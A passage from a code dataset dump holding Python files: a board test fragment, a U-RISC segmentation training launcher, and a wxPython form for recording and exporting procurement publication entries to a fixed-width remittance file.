print(board)\n# board.show_board()\n# display_moves()\n#\n# board.make_move_for_player([[3,6],7],1)\n# print(board)\n# board.show_board()\n# display_moves()\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"DoubleSnake/BoardTest.py","file_name":"BoardTest.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"92936623","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@File : main.py\n@Author : Brandon Han\n@Contact : hxiao@zju.edu.cn\n@Time : 2019/11/25 20:03 \n\"\"\"\n\nimport argparse\nfrom utils.model_related import Params, make_figure_dir\nfrom train_and_test import *\n\nparser = argparse.ArgumentParser(description='U-RISC training routine')\nparser.add_argument('--train_data_path', type=str, default='data_input/simple/train/',\n help='path to train data')\nparser.add_argument('--train_label_path', type=str, default='data_input/simple/labels/train/',\n help='path to train ground truth label')\nparser.add_argument('--val_data_path', type=str, default='data_input/simple/val/',\n help='path to val data')\nparser.add_argument('--val_label_path', type=str, default='data_input/simple/val/',\n help='path to val ground truth label')\nparser.add_argument('--save_folder', type=str, default=\"models/\", help='path to save models')\nparser.add_argument('--restore_from', default=None, type=str,\n help='path to load fully-trained models, like checkpoint/pre-trained model')\nparser.add_argument('--json_path', default='params.json', type=str, help='path to configuration json')\nparser.add_argument('--test', action='store_true', default=False, help='type it for test process')\nargs = parser.parse_args()\n\n# Load parameters from json file\nassert os.path.exists(args.json_path), \"No json file found!\"\nparams = Params(args.json_path)\nparams.restore_from = args.restore_from\nparams.save_folder = args.save_folder\nparams.train_data_path = args.train_data_path\nparams.train_label_path = args.train_label_path\nparams.val_data_path = args.val_data_path\nparams.val_label_path = args.val_label_path\nparams.cuda = torch.cuda.is_available()\n\n# make_figure_dir()\n\nif __name__ == '__main__':\n if args.test:\n test_model(params)\n else:\n train_model(params)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"273075542","text":"# -*- coding: utf-8 -*-\n\nimport wx\nfrom wx.lib import masked\nimport datetime\nfrom models import *\nimport sys\nimport os\nimport codecs\nfrom sqlalchemy import func\n\nsetup_all()\n\nID_TOOLBAR_PUBLICACAO_NOVO = 5001\nID_TOOLBAR_PUBLICACAO_EDITAR = 5002\nID_TOOLBAR_PUBLICACAO_EXCLUIR = 5003\nID_TOOLBAR_PUBLICACAO_CRIAR_ARQUIVO = 5004\n\n\nclass WindowPublicacao(wx.MiniFrame):\n\n def __init__(self, parent):\n\n wx.MiniFrame.__init__(self, parent, id=wx.ID_ANY, size=(530, 300), pos=(300, 170), title=u\"Publicação\", style= wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.CLIP_CHILDREN)\n self.panelPublicacao = wx.Panel(self, wx.ID_ANY)\n\n self.vbox1 = wx.BoxSizer(wx.VERTICAL)\n\n self.toolBar = wx.ToolBar(self, id=wx.ID_ANY, pos=wx.DefaultPosition, size=wx.DefaultSize, style=wx.TB_TEXT)\n\n self.toolBar.AddLabelTool(ID_TOOLBAR_PUBLICACAO_NOVO, \"Novo\", wx.Bitmap(\"./imagens/add.png\"), shortHelp=u'Adiciona nova publicação')\n self.toolBar.AddSeparator()\n self.toolBar.AddLabelTool(ID_TOOLBAR_PUBLICACAO_EDITAR, \"Editar\", 
wx.Bitmap(\"./imagens/edit.png\"), shortHelp=u'Edita publicação selecionada')\n self.toolBar.AddSeparator()\n self.toolBar.AddLabelTool(ID_TOOLBAR_PUBLICACAO_EXCLUIR, \"Remover\", wx.Bitmap(\"./imagens/remove.png\"), shortHelp=u'Exclui publicação selecionada')\n self.toolBar.AddSeparator()\n self.toolBar.AddLabelTool(ID_TOOLBAR_PUBLICACAO_CRIAR_ARQUIVO, \"Gerar Arquivo\", wx.Bitmap(\"./imagens/file.png\"), shortHelp=u'Gera arquivo de publicação')\n self.toolBar.AddSeparator()\n self.toolBar.AddSeparator()\n self.toolBar.Realize()\n self.SetToolBar(self.toolBar)\n\n self.choicesCompetencias = [u'Orçamento', u'Janeiro', u'Fevereiro', u'Março', u'Abril', u'Maio', u'Junho', u'Julho', u'Agosto', u'Setembro',\n u'Outubro', u'Novembro', u'Dezembro'\n ]\n\n self.cbCompetenciaForView = wx.ComboBox(self.panelPublicacao, -1, pos=(1, 5), size=(200, -1), choices=self.choicesCompetencias, style=wx.CB_READONLY)\n self.cbCompetenciaForView.Bind(wx.EVT_COMBOBOX, self.insereInCtrList)\n\n #ListCtrl\n self.hbox1 = wx.BoxSizer(wx.HORIZONTAL)\n self.publicacaoListCtrl = wx.ListCtrl(self.panelPublicacao, wx.ID_ANY, pos=(0, 30), size=(525, 200), style=wx.LC_REPORT)\n self.publicacaoListCtrl.InsertColumn(0, u'Licitação', width=150)\n self.publicacaoListCtrl.InsertColumn(1, u'Data Publicação', width=200)\n self.publicacaoListCtrl.InsertColumn(2, u'Veículo', width=170)\n self.publicacaoListCtrl.InsertColumn(3, u'', width=0)\n self.publicacaoListCtrl.Bind(wx.EVT_LIST_ITEM_SELECTED, self.capturaIdItemSelecionado)\n self.publicacaoListCtrl.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.anulaIdItemSelecionado)\n self.idSelecionado = None\n\n self.hbox1.Add(self.publicacaoListCtrl, 1, wx.EXPAND)\n #Fim ListCtrl\n\n #Binds\n self.Bind(wx.EVT_MENU, self.novoPublicacao, id=ID_TOOLBAR_PUBLICACAO_NOVO)\n self.Bind(wx.EVT_MENU, lambda event: self.vizualizaPublicacao(event, self.idSelecionado), id=ID_TOOLBAR_PUBLICACAO_EDITAR)\n self.Bind(wx.EVT_MENU, lambda event: self.excluiPublicacao(event, self.idSelecionado), id=ID_TOOLBAR_PUBLICACAO_EXCLUIR)\n self.Bind(wx.EVT_MENU, self.geraArquivoWindow, id=ID_TOOLBAR_PUBLICACAO_CRIAR_ARQUIVO)\n self.Bind(wx.EVT_CLOSE, self.quit)\n #Fim Binds\n\n self.Centre()\n self.MakeModal(True)\n self.Show()\n\n def quit(self, event):\n\n self.MakeModal(False)\n self.Destroy()\n\n def anulaIdItemSelecionado(self, event):\n\n self.idSelecionado = None\n\n def capturaIdItemSelecionado(self, event):\n\n self.idSelecionado = self.publicacaoListCtrl.GetItem(event.GetIndex(), 3).GetText()\n\n def toolBarControler(self, novo=True, editar=True, remover=True, gerar=True):\n\n self.toolBar.EnableTool(ID_TOOLBAR_PUBLICACAO_NOVO, novo)\n self.toolBar.EnableTool(ID_TOOLBAR_PUBLICACAO_EDITAR, editar)\n self.toolBar.EnableTool(ID_TOOLBAR_PUBLICACAO_EXCLUIR, remover)\n self.toolBar.EnableTool(ID_TOOLBAR_PUBLICACAO_CRIAR_ARQUIVO, gerar)\n\n def insereInCtrList(self, event):\n\n self.publicacaoListCtrl.DeleteAllItems()\n\n if self.cbCompetenciaForView.GetSelection() != -1:\n publicacoes = Publicacao.query.filter_by(competencia=self.cbCompetenciaForView.GetValue()).all()\n\n for publicacao in publicacoes:\n\n index = self.publicacaoListCtrl.InsertStringItem(sys.maxint, unicode(publicacao.numeroProcesso))\n self.publicacaoListCtrl.SetStringItem(index, 1, publicacao.dataPublicacao)\n self.publicacaoListCtrl.SetStringItem(index, 2, publicacao.veiculoComunicacao)\n self.publicacaoListCtrl.SetStringItem(index, 3, unicode(publicacao.id))\n\n def novoPublicacao(self, event):\n\n self.toolBarControler(False, False, False, 
False)\n\n self.windowNovopublicacao = wx.MiniFrame(parent=self, id=wx.ID_ANY, size=(500, 270), pos=(300, 170), title=u'Novo - Publicação', style= wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.CLIP_CHILDREN)\n self.panelNovoPublicacao = wx.Panel(self.windowNovopublicacao, wx.ID_ANY)\n\n self.tcId = wx.TextCtrl(self.panelNovoPublicacao, -1, pos=(0, 0), size=(0, 0))\n self.tcId.SetValue('0')\n\n self.stCompetencia = wx.StaticText(self.panelNovoPublicacao, -1, u'Competência', pos=(10, 5))\n self.cbCompetencia = wx.ComboBox(self.panelNovoPublicacao, -1, pos=(10, 25), size=(200, -1), choices=self.choicesCompetencias, style=wx.CB_READONLY)\n self.cbCompetencia.Bind(wx.EVT_COMBOBOX, self.insereNumeroProcesso)\n\n wx.StaticBox(self.panelNovoPublicacao, -1, pos=(5, 50), size=(480, 140))\n\n self.stNumeroProcesso = wx.StaticText(self.panelNovoPublicacao, -1, u'Número Proc. Licitatório', pos=(10, 70))\n self.cbNumeroProcesso = wx.ComboBox(self.panelNovoPublicacao, -1, pos=(10, 90), size=(100, -1), style=wx.CB_READONLY)\n\n self.stDataPublicacao = wx.StaticText(self.panelNovoPublicacao, -1, u'Data Publicação', pos=(160, 70))\n self.tcDataPublicacao = masked.TextCtrl(self.panelNovoPublicacao, -1, mask=\"##/##/####\")\n self.tcDataPublicacao.SetSize((80, -1))\n self.tcDataPublicacao.SetPosition((160, 90))\n \n self.stVeiculoComunicacao = wx.StaticText(self.panelNovoPublicacao, -1, u'Veículo de Comunicação', pos=(10, 130))\n self.tcVeiculoComunicacao = wx.TextCtrl(self.panelNovoPublicacao, -1, pos=(10, 150), size=(320, -1), style=wx.ALIGN_LEFT)\n self.tcVeiculoComunicacao.SetMaxLength(50)\n\n self.btnSalvar = wx.Button(self.panelNovoPublicacao, -1, u\"Salvar\", pos=(150, 210))\n self.btnSalvar.Bind(wx.EVT_BUTTON, self.salvarPublicacao)\n self.btnCancelar = wx.Button(self.panelNovoPublicacao, -1, u\"Cancelar\", pos=(250, 210))\n self.btnCancelar.Bind(wx.EVT_BUTTON, self.quitNovoPublicacao)\n\n #Bind\n self.windowNovopublicacao.Bind(wx.EVT_CLOSE, self.quitNovoPublicacao)\n\n self.windowNovopublicacao.Centre()\n self.windowNovopublicacao.Show()\n\n def quitNovoPublicacao(self, event):\n\n self.toolBarControler(True, True, True, True)\n self.windowNovopublicacao.Destroy()\n\n def insereNumeroProcesso(self, event):\n\n self.cbNumeroProcesso.Clear()\n\n licitacoes = Licitacao.query.filter_by(competencia=self.cbCompetencia.GetValue()).all()\n\n if not licitacoes:\n self.message = wx.MessageDialog(None, u'Não existe Licitações para a competência selecionada!', 'Info', wx.OK)\n self.message.ShowModal()\n self.cbNumeroProcesso.Disable()\n\n else:\n for licitacao in licitacoes:\n\n self.cbNumeroProcesso.Append(unicode(licitacao.numeroProcessoLicitatorio))\n\n self.cbNumeroProcesso.Enable()\n\n def validateDate(self, date, field):\n\n if date == \" / / \":\n self.message = wx.MessageDialog(None, u'O campo '+field+' deve ser preenchido!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if date[0:2] == ' ':\n self.message = wx.MessageDialog(None, u'Preencha o dia no campo '+field, 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if date[3:5] == ' ':\n self.message = wx.MessageDialog(None, u'Preencha o mês no campo '+field, 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if date[6:] == ' ':\n self.message = wx.MessageDialog(None, u'Preencha o ano no campo '+field, 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if int(date[0:2]) < 1 or int(date[0:2]) > 31:\n self.message = wx.MessageDialog(None, u'No campo '+field+u' o dia deve estar entre 1 e 31!', 'Info', wx.OK)\n 
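# Sketch of an alternative (not in the original): a single\n # datetime.datetime.strptime(date, '%d/%m/%Y') call would reject most malformed\n # dates at once; the field-by-field checks here give targeted error messages.\n 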
self.message.ShowModal()\n return 0\n\n if int(date[3:5]) < 1 or int(date[3:5]) > 12:\n self.message = wx.MessageDialog(None, u'No campo '+field+u' o mês deve estar entre 1 e 12!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if int(date[6:]) < 1900:\n self.message = wx.MessageDialog(None, u'No campo '+field+u' o ano deve estar no formato de quatro dígitos!E ser maior que 1900!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if int(date[3:5]) == 2:\n if int(date[0:2]) > 29:\n self.message = wx.MessageDialog(None, u'Campo: '+field+u'\\nNo mês de Fevereiro nunca tem um dia maior que 29!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n else:\n try:\n datetime.date(int(date[6:10]), int(date[3:5]), int(date[0:2]))\n except ValueError:\n self.message = wx.MessageDialog(None, u'Campo: '+field+u'\\nEste ano Fevereiro não possui o dia 29!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n return 1\n\n def valida(self):\n\n if self.cbCompetencia.GetSelection() == -1:\n\n self.message = wx.MessageDialog(None, u'Selecione uma opção no campo Competência', 'Info', wx.OK)\n self.cbCompetencia.SetFocus()\n self.message.ShowModal()\n return 0\n\n if self.cbNumeroProcesso.GetSelection() == -1:\n\n self.message = wx.MessageDialog(None, u'Selecione uma opção no campo Número Proc. Licitatório', 'Info', wx.OK)\n self.cbNumeroProcesso.SetFocus()\n self.message.ShowModal()\n return 0\n \n if not self.validateDate(self.tcDataPublicacao.GetValue(), u\"Data Publicação\"):\n self.tcDataPublicacao.SelectAll()\n self.tcDataPublicacao.SetFocus()\n return 0\n\n if self.tcVeiculoComunicacao.GetValue() == u'':\n\n self.message = wx.MessageDialog(None, u'O campo Veículo de Comunicação deve ser preenchido!', 'Info', wx.OK)\n self.tcVeiculoComunicacao.SetFocus()\n self.message.ShowModal()\n return 0\n\n return 1\n\n def salvarPublicacao(self, event):\n\n if self.valida():\n\n Publicacao(numeroProcesso=unicode(self.cbNumeroProcesso.GetValue()),\n dataPublicacao=unicode(self.tcDataPublicacao.GetValue()),\n veiculoComunicacao=unicode(self.tcVeiculoComunicacao.GetValue()),\n competencia=unicode(self.cbCompetencia.GetValue())\n )\n\n session.commit()\n self.message = wx.MessageDialog(None, u'Publicação salva com sucesso!', 'Info', wx.OK)\n self.message.ShowModal()\n self.insereInCtrList(None)\n self.quitNovoPublicacao(None)\n\n \n def vizualizaPublicacao(self, event, idPublicacao):\n\n if idPublicacao is None:\n self.message = wx.MessageDialog(None, u'Nenhuma publicação foi selecionada! 
Selecione uma na lista!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n self.publicacao = Publicacao.query.filter_by(id=idPublicacao).first()\n\n self.toolBarControler(False, False, False, False)\n\n self.windowVizualizapublicacao = wx.MiniFrame(parent=self, id=wx.ID_ANY, size=(500, 270), pos=(300, 170), title=u'Editar - Publicação', style= wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.CLIP_CHILDREN)\n self.panelVizualizaPublicacao = wx.Panel(self.windowVizualizapublicacao, wx.ID_ANY)\n\n self.tcId = wx.TextCtrl(self.panelVizualizaPublicacao, -1, pos=(0, 0), size=(0, 0))\n self.tcId.SetValue(unicode(self.publicacao.id))\n\n self.stCompetencia = wx.StaticText(self.panelVizualizaPublicacao, -1, u'Competência', pos=(10, 5))\n self.cbCompetencia = wx.ComboBox(self.panelVizualizaPublicacao, -1, pos=(10, 25), size=(200, -1), choices=self.choicesCompetencias, style=wx.CB_READONLY)\n self.cbCompetencia.Bind(wx.EVT_COMBOBOX, self.insereNumeroProcesso)\n self.cbCompetencia.SetValue(self.publicacao.competencia)\n\n wx.StaticBox(self.panelVizualizaPublicacao, -1, pos=(5, 50), size=(480, 140))\n\n self.stNumeroProcesso = wx.StaticText(self.panelVizualizaPublicacao, -1, u'Número Proc. Licitatório', pos=(10, 70))\n self.cbNumeroProcesso = wx.ComboBox(self.panelVizualizaPublicacao, -1, pos=(10, 90), size=(100, -1), style=wx.CB_READONLY)\n self.insereNumeroProcesso(None)\n self.cbNumeroProcesso.SetValue(self.publicacao.numeroProcesso)\n\n self.stDataPublicacao = wx.StaticText(self.panelVizualizaPublicacao, -1, u'Data Publicação', pos=(160, 70))\n self.tcDataPublicacao = masked.TextCtrl(self.panelVizualizaPublicacao, -1, mask=\"##/##/####\")\n self.tcDataPublicacao.SetSize((80, -1))\n self.tcDataPublicacao.SetPosition((160, 90))\n #self.tcDataPublicacao.Bind(wx.EVT_KILL_FOCUS, self.adicionaSequencia)\n self.tcDataPublicacao.SetValue(self.publicacao.dataPublicacao)\n \n self.stVeiculoComunicacao = wx.StaticText(self.panelVizualizaPublicacao, -1, u'Veículo de Comunicação', pos=(10, 130))\n self.tcVeiculoComunicacao = wx.TextCtrl(self.panelVizualizaPublicacao, -1, pos=(10, 150), size=(320, -1), style=wx.ALIGN_LEFT)\n self.tcVeiculoComunicacao.SetMaxLength(50)\n self.tcVeiculoComunicacao.SetValue(self.publicacao.veiculoComunicacao)\n\n self.btnSalvar = wx.Button(self.panelVizualizaPublicacao, -1, u\"Alterar\", pos=(150, 210))\n self.btnSalvar.Bind(wx.EVT_BUTTON, self.editarPublicacao)\n self.btnCancelar = wx.Button(self.panelVizualizaPublicacao, -1, u\"Cancelar\", pos=(250, 210))\n self.btnCancelar.Bind(wx.EVT_BUTTON, self.quitVizualizaPublicacao)\n\n #Bind\n self.windowVizualizapublicacao.Bind(wx.EVT_CLOSE, self.quitVizualizaPublicacao)\n\n self.windowVizualizapublicacao.Centre()\n self.windowVizualizapublicacao.Show()\n\n def quitVizualizaPublicacao(self, event):\n\n self.toolBarControler(True, True, True, True)\n self.windowVizualizapublicacao.Destroy()\n\n def editarPublicacao(self, event):\n\n if self.valida():\n\n self.publicacao.numeroProcesso = unicode(self.cbNumeroProcesso.GetValue())\n self.publicacao.dataPublicacao = unicode(self.tcDataPublicacao.GetValue())\n self.publicacao.veiculoComunicacao = unicode(self.tcVeiculoComunicacao.GetValue())\n self.publicacao.competencia = unicode(self.cbCompetencia.GetValue())\n\n session.commit()\n self.message = wx.MessageDialog(None, u'Publicação alterada com sucesso!', 'Info', wx.OK)\n self.message.ShowModal()\n self.insereInCtrList(None)\n self.quitVizualizaPublicacao(None)\n\n def excluiPublicacao(self, event, idPublicacao):\n\n if idPublicacao is 
None:\n self.message = wx.MessageDialog(None, u'Selecione um item na lista!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n remove_dial = wx.MessageDialog(None, u'Tem certeza que deseja excluir esta publicação?', u'Excluir - Publicação', wx.YES_NO | wx.NO_DEFAULT | wx.ICON_QUESTION)\n ret = remove_dial.ShowModal()\n if ret == wx.ID_YES:\n self.publicacao = Publicacao.query.filter_by(id=idPublicacao).first()\n self.publicacao.delete()\n session.commit()\n self.insereInCtrList(None)\n self.anulaIdItemSelecionado(None)\n self.message = wx.MessageDialog(None, u'Publicação excluída com sucesso!', 'Info', wx.OK)\n self.message.ShowModal()\n\n def geraArquivoWindow(self, event):\n\n self.toolBarControler(False, False, False, False)\n\n self.windowGeraArquivo = wx.MiniFrame(parent=self, id=wx.ID_ANY, size=(680, 470), pos=(300, 170), title=u\"Gerar Arquivo Publicação\", style= wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.CLIP_CHILDREN)\n self.panelGeraArquivo = wx.Panel(self.windowGeraArquivo, wx.ID_ANY)\n\n wx.StaticBox(self.panelGeraArquivo, -1, pos=(0, 0), size=(660, 60))\n\n choicesCompetencias = list(self.choicesCompetencias) # copy: appending u'Todos' to the shared list would duplicate the entry every time the window opens\n choicesCompetencias.append(u'Todos')\n self.stGeraArquivoCompetencia = wx.StaticText(self.panelGeraArquivo, -1, u'Publicação', pos=(10, 10), style=wx.ALIGN_LEFT)\n self.cbGeraArquivoCompetencia = wx.ComboBox(self.panelGeraArquivo, -1, pos=(10, 30), size=(250, -1), choices=choicesCompetencias, style=wx.CB_READONLY)\n self.cbGeraArquivoCompetencia.Bind(wx.EVT_COMBOBOX, self.inserePublicacaoPorCompetencia)\n\n self.competenciaAtual = None\n self.itensGeraArquivoListCtrl = []\n self.itensParaArquivosListCtrl = []\n\n wx.StaticText(self.panelGeraArquivo, -1, u'Inserir:', pos=(10, 70))\n self.publicacaoGeraArquivoListCtrl = wx.ListCtrl(self.panelGeraArquivo, wx.ID_ANY, pos=(10, 90), size=(250, 300), style=wx.LC_REPORT)\n self.publicacaoGeraArquivoListCtrl.InsertColumn(0, u'Licitação', width=100)\n self.publicacaoGeraArquivoListCtrl.InsertColumn(1, u'Data Publicação', width=80)\n self.publicacaoGeraArquivoListCtrl.InsertColumn(2, u'Veículo', width=70)\n self.publicacaoGeraArquivoListCtrl.InsertColumn(3, u'', width=0)\n self.publicacaoGeraArquivoListCtrl.Bind(wx.EVT_LIST_ITEM_SELECTED, self.selecionaItensPublicacaoGeraArquivos)\n\n self.btnGeraArquivo = wx.Button(self.panelGeraArquivo, -1, u\">>\", pos=(290, 200))\n self.btnGeraArquivo.Bind(wx.EVT_BUTTON, self.insereGeraArquivo)\n self.btnRemoveGeraArquivo = wx.Button(self.panelGeraArquivo, -1, u\"<<\", pos=(290, 250))\n self.btnRemoveGeraArquivo.Bind(wx.EVT_BUTTON, self.removeGeraArquivo)\n\n wx.StaticText(self.panelGeraArquivo, -1, u'Gerar Arquivo Com:', pos=(400, 70))\n self.publicacaoParaArquivoListCtrl = wx.ListCtrl(self.panelGeraArquivo, wx.ID_ANY, pos=(400, 90), size=(250, 300), style=wx.LC_REPORT)\n self.publicacaoParaArquivoListCtrl.InsertColumn(0, u'Licitação', width=100)\n self.publicacaoParaArquivoListCtrl.InsertColumn(1, u'Data Publicação', width=80)\n self.publicacaoParaArquivoListCtrl.InsertColumn(2, u'Veículo', width=70)\n self.publicacaoParaArquivoListCtrl.InsertColumn(3, u'', width=0)\n self.publicacaoParaArquivoListCtrl.Bind(wx.EVT_LIST_ITEM_SELECTED, self.selecionaItensPublicacaoParaArquivo)\n\n self.btnGerarArquivo = wx.Button(self.panelGeraArquivo, -1, \"Gerar Arquivo\", pos=(300, 400))\n self.btnGerarArquivo.Bind(wx.EVT_BUTTON, self.geraArquivoDialog)\n self.windowGeraArquivo.Bind(wx.EVT_CLOSE, self.quitGeraArquivo)\n\n self.windowGeraArquivo.Centre()\n self.windowGeraArquivo.Show()\n\n def 
quitGeraArquivo(self, event):\n\n self.toolBarControler(True, True, True, True)\n self.windowGeraArquivo.Destroy()\n\n def inserePublicacaoPorCompetencia(self, event):\n\n publicacoes = []\n if self.competenciaAtual == unicode(self.cbGeraArquivoCompetencia.GetValue()):\n return 0\n\n elif self.cbGeraArquivoCompetencia.GetValue() != u'Todos':\n\n publicacoes = Publicacao.query.filter_by(competencia=self.cbGeraArquivoCompetencia.GetValue()).all()\n else:\n\n publicacoes = Publicacao.query.all()\n\n self.publicacaoGeraArquivoListCtrl.DeleteAllItems()\n\n if not publicacoes:\n self.message = wx.MessageDialog(None, u'Não existe publicações para esta competência!', 'Info', wx.OK)\n self.message.ShowModal()\n\n else:\n\n if len(publicacoes) == self.publicacaoParaArquivoListCtrl.GetItemCount():\n pass\n\n else:\n\n for publicacao in publicacoes:\n igual = False\n if self.publicacaoParaArquivoListCtrl.GetItemCount() == 0:\n index = self.publicacaoGeraArquivoListCtrl.InsertStringItem(sys.maxint, unicode(publicacao.numeroProcesso))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 1, unicode(publicacao.dataPublicacao))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 2, unicode(publicacao.veiculoComunicacao))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 3, unicode(publicacao.id))\n igual = True\n\n else:\n\n for x in range(self.publicacaoParaArquivoListCtrl.GetItemCount()):\n\n if publicacao.numeroProcesso == unicode(self.publicacaoParaArquivoListCtrl.GetItem(x, 0).GetText()) and publicacao.dataPublicacao == unicode(self.publicacaoParaArquivoListCtrl.GetItem(x, 1).GetText()) and publicacao.veiculoComunicacao == unicode(self.publicacaoParaArquivoListCtrl.GetItem(x, 2).GetText()):\n igual = True\n\n if not igual:\n\n index = self.publicacaoGeraArquivoListCtrl.InsertStringItem(sys.maxint, unicode(publicacao.numeroProcesso))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 1, unicode(publicacao.dataPublicacao))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 2, unicode(publicacao.veiculoComunicacao))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 3, unicode(publicacao.id))\n\n self.competenciaAtual = unicode(self.cbGeraArquivoCompetencia.GetValue())\n\n def selecionaItensPublicacaoGeraArquivos(self, event):\n\n item = self.publicacaoGeraArquivoListCtrl.GetFirstSelected()\n self.itensGeraArquivoListCtrl = []\n while item != -1:\n self.itensGeraArquivoListCtrl.append(item)\n item = self.publicacaoGeraArquivoListCtrl.GetNextSelected(item)\n\n def selecionaItensPublicacaoParaArquivo(self, event):\n\n item = self.publicacaoParaArquivoListCtrl.GetFirstSelected()\n self.itensParaArquivosListCtrl = []\n while item != -1:\n self.itensParaArquivosListCtrl.append(item)\n item = self.publicacaoParaArquivoListCtrl.GetNextSelected(item)\n\n def insereGeraArquivo(self, event):\n\n if not self.itensGeraArquivoListCtrl:\n\n self.message = wx.MessageDialog(None, u'Selecione os publicacoes a serem inseridos!', 'Info', wx.OK)\n self.message.ShowModal()\n\n else:\n\n for item in self.itensGeraArquivoListCtrl:\n\n index = self.publicacaoParaArquivoListCtrl.InsertStringItem(sys.maxint, unicode(self.publicacaoGeraArquivoListCtrl.GetItem(item, 0).GetText()))\n self.publicacaoParaArquivoListCtrl.SetStringItem(index, 1, unicode(self.publicacaoGeraArquivoListCtrl.GetItem(item, 1).GetText()))\n self.publicacaoParaArquivoListCtrl.SetStringItem(index, 2, unicode(self.publicacaoGeraArquivoListCtrl.GetItem(item, 2).GetText()))\n 
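# Column 3 is the zero-width (hidden) column that carries each row's database id\n # between the two lists, so the record can be looked up again later.\n 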
self.publicacaoParaArquivoListCtrl.SetStringItem(index, 3, unicode(self.publicacaoGeraArquivoListCtrl.GetItem(item, 3).GetText()))\n\n for item in reversed(self.itensGeraArquivoListCtrl):\n self.publicacaoGeraArquivoListCtrl.DeleteItem(item)\n\n self.itensGeraArquivoListCtrl = []\n\n def removeGeraArquivo(self, event):\n\n if not self.itensParaArquivosListCtrl:\n self.message = wx.MessageDialog(None, u'Selecione os publicacoes a serem removidos!', 'Info', wx.OK)\n self.message.ShowModal()\n else:\n\n for item in self.itensParaArquivosListCtrl:\n\n index = self.publicacaoGeraArquivoListCtrl.InsertStringItem(sys.maxint, unicode(self.publicacaoParaArquivoListCtrl.GetItem(item, 0).GetText()))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 1, unicode(self.publicacaoParaArquivoListCtrl.GetItem(item, 1).GetText()))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 2, unicode(self.publicacaoParaArquivoListCtrl.GetItem(item, 2).GetText()))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 3, unicode(self.publicacaoParaArquivoListCtrl.GetItem(item, 3).GetText()))\n\n for item in reversed(self.itensParaArquivosListCtrl):\n self.publicacaoParaArquivoListCtrl.DeleteItem(item)\n\n self.itensParaArquivosListCtrl = []\n\n def geraArquivoDialog(self, event):\n\n if self.publicacaoParaArquivoListCtrl.GetItemCount() == 0:\n\n self.message = wx.MessageDialog(None, u'Selecione os publicacoes para gerar o arquivo!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n else:\n\n dlg = wx.FileDialog(self, message=u\"Salvar \", defaultDir=\"\", defaultFile=\"PUBLICACAO.REM\", wildcard=\"Arquivo de Remessa (*.REM)|*.REM\", style=wx.SAVE)\n if dlg.ShowModal() == wx.ID_OK:\n\n self.path = dlg.GetPath()\n if os.path.exists(self.path):\n\n remove_dial = wx.MessageDialog(None, u'Já existe um arquivo '+dlg.GetFilename()+u\".\\n Deseja substituí-lo?\", 'Sair', wx.YES_NO | wx.NO_DEFAULT | wx.ICON_QUESTION)\n ret = remove_dial.ShowModal()\n if ret == wx.ID_YES:\n\n #VERIFICAR AS DEPENDENCIAS AKI DEPOIS\n #self.message = wx.MessageDialog(None, u'Após criar o arquivo de convênios é necessário gerar o arquivo de Participantes de Convênio!\\n', 'Info', wx.OK | wx.ICON_EXCLAMATION)\n #self.message.ShowModal()\n\n if self.geraArquivo():\n self.message = wx.MessageDialog(None, u'Arquivo de Publicações gerado com sucesso!', 'Info', wx.OK)\n self.message.ShowModal()\n \n else:\n self.message = wx.MessageDialog(None, u'Houve um erro na geração do arquivo!\\nVerifique se você tem permissão de escrita ou se o arquivo já se encontra aberto!', 'Error', wx.OK)\n self.message.ShowModal()\n \n else:\n pass\n\n else:\n if self.geraArquivo():\n self.message = wx.MessageDialog(None, u'Arquivo de Publicações com sucesso!', 'Info', wx.OK)\n self.message.ShowModal()\n \n else:\n self.message = wx.MessageDialog(None, u'Houve um erro na geração do arquivo!\\nVerifique se você tem permiss��o de escrita ou se o arquivo já se encontra aberto!', 'Error', wx.OK)\n self.message.ShowModal()\n \n\n def geraArquivo(self):\n\n f = codecs.open(self.path, \"w\", \"utf-8\")\n\n for x in range(self.publicacaoParaArquivoListCtrl.GetItemCount()):\n\n try:\n\n idEmpenho = int(self.publicacaoParaArquivoListCtrl.GetItem(x, 3).GetText())\n publicacao = Publicacao.query.filter_by(id=idEmpenho).first()\n\n f.write(unicode(publicacao.numeroProcesso.ljust(18).replace(\"'\", \"\").replace(\"\\\"\", \"\")))\n f.write(unicode(self.transformaData(publicacao.dataPublicacao)))\n f.write(unicode(publicacao.veiculoComunicacao).ljust(50).replace(\"'\", 
